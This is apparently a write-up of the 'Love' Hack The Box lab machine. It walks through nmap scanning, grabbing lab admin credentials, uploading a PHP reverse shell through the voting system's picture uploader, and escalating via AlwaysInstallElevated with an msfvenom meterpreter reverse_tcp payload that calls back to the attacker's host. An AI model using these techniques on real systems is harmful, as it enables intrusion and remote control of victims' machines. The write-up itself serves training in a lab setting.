In this post, i would like to share walkthrough on Love Machine.
This room is been considered difficulty rated as EASY machine
We need to read the following article to fully managed root the machine
- Penetration-Testing-Grimoire/always-install-elevated.md at master · RackunSec/Penetration-Testing-Grimoire · GitHub
- Always Install Elevated – Penetration Testing Lab (pentestlab.blog)
- Voting System 1.0 Shell Upload ≈ Packet Storm (packetstormsecurity.com)
Once we have started the VPN connection, we can start information gathering on the machine by executing the command nmap -sC -sV <IP Address> -PN
# Nmap 7.91 scan initiated Sat May 1 17:44:08 2021 as: nmap -sC -sV -oA intial -Pn 10.129.102.135 Nmap scan report for 10.129.102.135 Host is up (0.66s latency). Not shown: 993 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27) | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set |_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 |_http-title: Voting System using PHP 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 443/tcp open ssl/http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27) |_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 |_http-title: 403 Forbidden | ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in | Not valid before: 2021-01-18T14:00:16 |_Not valid after: 2022-01-18T14:00:16 |_ssl-date: TLS randomness does not represent time | tls-alpn: |_ http/1.1 445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP) 3306/tcp open mysql? | fingerprint-strings: | DNSStatusRequestTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RTSPRequest, SMBProgNeg, TerminalServerCookie, X11Probe: |_ Host '10.10.16.13' is not allowed to connect to this MariaDB server 5000/tcp open http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27) |_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 |_http-title: 403 Forbidden 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port3306-TCP:V=7.91%I=7%D=5/1%Time=608DCBE3%P=x86_64-pc-linux-gnu%r(NUL SF:L,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.16\.13'\x20is\x20not\x20allowe SF:d\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(GenericLines, SF:4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.16\.13'\x20is\x20not\x20allowed\ SF:x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(GetRequest,4A," SF:F\0\0\x01\xffj\x04Host\x20'10\.10\.16\.13'\x20is\x20not\x20allowed\x20t SF:o\x20connect\x20to\x20this\x20MariaDB\x20server")%r(HTTPOptions,4A,"F\0 SF:\0\x01\xffj\x04Host\x20'10\.10\.16\.13'\x20is\x20not\x20allowed\x20to\x SF:20connect\x20to\x20this\x20MariaDB\x20server")%r(RTSPRequest,4A,"F\0\0\ SF:x01\xffj\x04Host\x20'10\.10\.16\.13'\x20is\x20not\x20allowed\x20to\x20c SF:onnect\x20to\x20this\x20MariaDB\x20server")%r(DNSStatusRequestTCP,4A,"F SF:\0\0\x01\xffj\x04Host\x20'10\.10\.16\.13'\x20is\x20not\x20allowed\x20to SF:\x20connect\x20to\x20this\x20MariaDB\x20server")%r(Help,4A,"F\0\0\x01\x SF:ffj\x04Host\x20'10\.10\.16\.13'\x20is\x20not\x20allowed\x20to\x20connec SF:t\x20to\x20this\x20MariaDB\x20server")%r(TerminalServerCookie,4A,"F\0\0 SF:\x01\xffj\x04Host\x20'10\.10\.16\.13'\x20is\x20not\x20allowed\x20to\x20 SF:connect\x20to\x20this\x20MariaDB\x20server")%r(Kerberos,4A,"F\0\0\x01\x SF:ffj\x04Host\x20'10\.10\.16\.13'\x20is\x20not\x20allowed\x20to\x20connec SF:t\x20to\x20this\x20MariaDB\x20server")%r(SMBProgNeg,4A,"F\0\0\x01\xffj\ SF:x04Host\x20'10\.10\.16\.13'\x20is\x20not\x20allowed\x20to\x20connect\x2 SF:0to\x20this\x20MariaDB\x20server")%r(X11Probe,4A,"F\0\0\x01\xffj\x04Hos SF:t\x20'10\.10\.16\.13'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x2 SF:0this\x20MariaDB\x20server")%r(FourOhFourRequest,4A,"F\0\0\x01\xffj\x04 SF:Host\x20'10\.10\.16\.13'\x20is\x20not\x20allowed\x20to\x20connect\x20to SF:\x20this\x20MariaDB\x20server")%r(LPDString,4A,"F\0\0\x01\xffj\x04Host\ SF:x20'10\.10\.16\.13'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20t SF:his\x20MariaDB\x20server")%r(LDAPSearchReq,4A,"F\0\0\x01\xffj\x04Host\x SF:20'10\.10\.16\.13'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20th SF:is\x20MariaDB\x20server")%r(LDAPBindReq,4A,"F\0\0\x01\xffj\x04Host\x20' SF:10\.10\.16\.13'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\ SF:x20MariaDB\x20server"); Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 21m20s, deviation: 0s, median: 21m20s | smb-security-mode: | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2021-05-01T22:07:08 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/
Let’s see the website interface
The website have show only the Voter’s ID and Password which we doesn’t have at the moment
Let’s us check on other port that mention on nmap result. The website show a forbidden page.
Oh wait! There’s a subdomain that been mention on the nmap result which is staging.love.htb
The website have been redirected to a Free File Scanner interface which also require login credentials.
Let’s click on the demo link at the top of website.
Let’s scan the url http://10.10.10.239:5000 and we gain a admin credentials such as
username: admin password: @LoveIsInTheAir!!!!
We need to use those credentials on http://love.htb/admin
We managed to logged into the VotingSystem Dashboard
Let’s do some research on the VotingSystem
I found a few epxloit that we can use on the system itself such as shown the screenshot above
However, the exploit didn’t work well for me so i decided to find another way to get a reverse shell on my machine
After a while, i found another php reverse shell at the website here
We need to download it and modify a little bit on the php code so that the reverse shell connection coming back to us.The modificaiton need to be done at sh=new Sh(‘127.0.0.1’,9000); with your VPN IP and port
There is two location that we use to upload our shell code.
*We need to start our nc listening first
The first location is that we need to create position that we will use on this method. Once that completed, we need to create a new candidate with upload shell at the picture uploader.
For the reverse shell to came back, we need to execute the shell at the url love.htb/images and click the filename that we save as shell
Another location is that location on the admin’s profile where we can upload the shell on the replace picture
You will get the shell back if you upload the shell in either places.
We can read the user flag on b going to C:\Users\Phoebe\Desktop and use the command “type user.txt“
Escalate to Root Privileges Access
We can run the winpeas.exe on the victim’s machine by transferring the file from our attacker’s machine. After a while, we found out that there’s a feature “AlwaysInstalledElevated” which is normally used to install the MSI package
Let’s do some research on “AlwaysInstalledElevated” exploit.
We found some exploits that use Metasploit Framework. So, let’s start using metasploit.
Firstly, we need to create a crafted exploit by using msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=<Port> -f exe > darknite.exe command
We need to transfer it into our victim’s machine
We can execute the exploit by type the filename just like show above
We can configure our metasploit exploit by running 2 session of multi/handler with divide by background
We can read the root flag by accessing C:\Users\Adminitrator\Desktop and use the “type root.txt” command
Happy Learning Guys!